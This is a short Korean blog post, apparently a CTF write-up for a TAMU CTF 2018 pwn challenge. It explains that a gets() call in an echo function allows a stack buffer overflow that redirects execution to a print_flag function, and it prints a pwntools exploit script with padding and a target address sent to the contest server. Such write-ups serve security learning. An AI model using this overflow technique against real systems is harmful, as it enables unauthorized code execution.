티스토리 뷰
main에서 echo함수 불러오고
gets 로 받으니깐 overflow 나겠네요
그리고 여기에도 마찬가지로 print_flag 함수가 있습니다! 그렇다면 overflow 시킨 다음 print_flag를 실행하게 하면 되겠네요
print_flag 주소를 구하고 익스 하겠습니다
이렇게도 풀 수 있고
이렇게 익스 코드 짜서 풀 수도 있네요!
1 2 3 4 5 6 7 8 9 10 11 12 13 | from pwn import * s = remote("pwn.ctf.tamu.edu",4322) payload="" payload+="\x90"*243 payload+=p32(0x804854b) #print_flag()'s addr sleep(0.5) s.sendline(payload) print s.recv() | cs |
'Pwnable > write up' 카테고리의 다른 글
[Defcon 2016]feedme (0) | 2018.08.27 |
---|---|
[TAMU ctf 2018] pwn4 (0) | 2018.05.17 |
[TAMU ctf 2018] pwn3 (0) | 2018.05.17 |
[TAMU ctf 2018] pwn1 (0) | 2018.05.17 |
[Codegate 2017] babypwn (0) | 2018.03.09 |
댓글